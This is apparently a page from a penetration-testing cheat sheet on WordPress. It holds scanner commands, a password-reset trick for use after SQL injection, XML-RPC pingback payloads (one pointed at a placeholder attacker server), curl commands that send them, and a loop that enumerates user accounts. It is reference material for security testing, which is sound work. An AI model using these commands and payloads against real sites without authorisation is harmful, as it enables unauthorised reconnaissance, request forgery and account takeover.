Pentest Book
Search…
Wordpress

Tools

1
wpscan --url https://url.com
2
vulnx -u https://example.com/ --cms --dns -d -w -e
3
python3 cmsmap.py https://www.example.com -F
4
python3 wpseku.py --url https://www.target.com --verbose
Copied!
1
# Check IP behing WAF:
2
https://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/
3
4
# SQLi in WP and can't crack users hash:
5
1. Request password reset.
6
2. Go to site.com/wp-login.php?action=rp&key={ACTIVATION_KEY}&login={USERNAME}
7
8
# XMLRPC
9
# https://github.com/nullfil3/xmlrpc-scan
10
# https://github.com/relarizky/wpxploit
11
# https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/
12
13
# pingback.xml:
14
<?xml version="1.0" encoding="iso-8859-1"?>
15
<methodCall>
16
<methodName>pingback.ping</methodName>
17
<params>
18
<param>
19
<value>
20
<string>http://10.0.0.1/hello/world</string>
21
</value>
22
</param>
23
<param>
24
<value>
25
<string>https://10.0.0.1/hello/world/</string>
26
</value>
27
</param>
28
</params>
29
</methodCall>
30
31
<methodCall>
32
<methodName>pingback.ping</methodName>
33
<params><param>
34
<value><string>http://<YOUR SERVER >:<port></string></value>
35
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
36
</value></param></params>
37
</methodCall>
38
39
# List methods:
40
<methodCall>
41
<methodName>system.listMethods</methodName>
42
<params></params>
43
</methodCall>
44
45
curl -X POST -d @pingback.xml https://exmaple.com/xmlrpc.php
46
47
# Evidence xmlrpc:
48
curl -d '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>demo.sayHello</methodName><params/></methodCall>' -k https://example.com/xmlrpc.php
49
50
# Enum User:
51
for i in {1..50}; do curl -s -L -i https://example.com/wordpress?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done
52
site.com/wp-json/wp/v2/users/
53
Copied!
Last modified 7mo ago
Export as PDF
Copy link